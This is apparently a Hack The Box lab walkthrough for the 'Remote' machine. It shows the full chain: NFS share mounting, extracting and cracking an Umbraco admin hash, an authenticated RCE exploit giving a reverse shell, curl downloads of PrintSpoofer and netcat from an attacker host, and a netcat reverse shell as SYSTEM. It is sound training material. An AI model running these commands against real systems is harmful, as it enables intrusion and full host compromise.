HTB - Remote
Scope
IP Address 10.10.10.180
Enumeration
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
5985/tcp open wsman
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -p21,80,111,139,445,2049,5985 $ip -sCV -oA Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4s
| smb2-time:
| date: 2024-07-06T02:24:29
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required* Open ports: 21, 80, 111, 135, 139, 445, 2049, 5985
* UDP Open ports: 111, 2049
* Services: FTP - HTTP - RPC - SMB - NFS - winRM
* Important Notes: FTP Anonymous loginService Enumeration
FTP
I noticed from Nmap that anonymous login is allowed but It didn't lead for anything
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
2024-07-05 22:42:16 (0.00 B/s) - ‘10.10.10.180/.listing’ saved [0]SMB
SMB Enumeration didn't lead for anything, too
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ smbclient -N -L //$ip
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.180 445 REMOTE [-] remote\: STATUS_ACCESS_DENIED RPC
The Same as SMB :(
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIEDNFS
I Found 2049 port open which is used by network file system (NFS), So I'll check if there is any accessible folders
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ showmount -e $ip
Export list for 10.10.10.180:
/site_backups (everyone)I Found an interesting folder, So I'll mount it to my host and see its content
──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ mkdir mnt
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ sudo mount -t nfs $ip:/ ./mnt -o nolock
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ cd mnt/site_backups
┌──(kali㉿kali)-[~/…/machines/Remote/mnt/site_backups]
└─$ ls
App_Browsers App_Plugins Global.asax Umbraco Views aspnet_client css scripts
App_Data Config Media Umbraco_Client Web.config bin default.aspxI tried to hunt for usernames & passwords, but nothing appears using grep command, So I searched online for Umbraco CMS and where it stores its credentials and I found this:
The CMS stores its credentials in Umbraco.sdf. After knowing this, I tried to open the file with text editor but it's binary file, so I list its content with strings and grep for credentials
┌──(kali㉿kali)-[~/…/machines/Remote/mnt/App_Data]
└─$ strings Umbraco.sdf | grep "users\|password\|hashes\|admin"
<snip>
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
<snip>So the file says that the hash is SHA1, let's fire up hashcat and crack it after getting the hashcat mode
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashid -m b8be16afba8c314ad33d812f22a04991b90e2aaa
[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashcat -m 100 hash /usr/share/wordlists/rockyou.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconanxxxxxxx
Session..........: hashcat
Status...........: CrackedInitial Access
At http://10.10.10.180/umbraco/ there is a login form.
I logged in with the credentials found before, then looked for the webapp version
I decided to search for public CVE with searchsploit
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ searchsploit umbraco
<snip>
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
<snip>I searched for poc on GitHub this match the version of the webapp and found this one:
I clone it locally and run the exploit
┌──(env)─(kali㉿kali)-[~/…/HTB/machines/Remote/Umbraco-RCE]
└─$ python exploit.py -u admin@htb.local -p 'baconanxxxxxxx' -w http://10.10.10.180/ -i 10.10.16.25
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49705
[+] Trying to bind to :: on port 4445: Done
[+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49706
[*] Logging in at http://10.10.10.180//umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://10.10.10.180//umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode
PS C:\windows\system32\inetsrv> PS C:\Users\Public> type Desktop\user.txt
442f18b8accdec694dxxxxxxxxxxxPrivilege Escalation
When I typed whoami command and saw the output, I knew it's an easy win cause user iis apppool\defaultapppool often has SeImpersonatePrivilege which can be used to escalate to system using RoguePotato or PrintSpoofer
PS C:\Users\Public> whoami
iis apppool\defaultapppoolLet's verify
PS C:\Users\Public> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledI downloaded PrintSpoofer.exe & nc.exe from my attack host
PS C:\Users\Public> curl 10.10.16.25/PrintSpoofer.exe -o .\PrintSpoofer.exe
PS C:\Users\Public> curl 10.10.16.25/nc.exe -o .\nc.exeEasy win :)
PS C:\Users\Public> .\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
.\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.180] 49719
PS C:\Windows\system32> whoami
nt authority\systemPS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
60ea8c532b06a17faxxxxxxxxxxxxxxxLast updated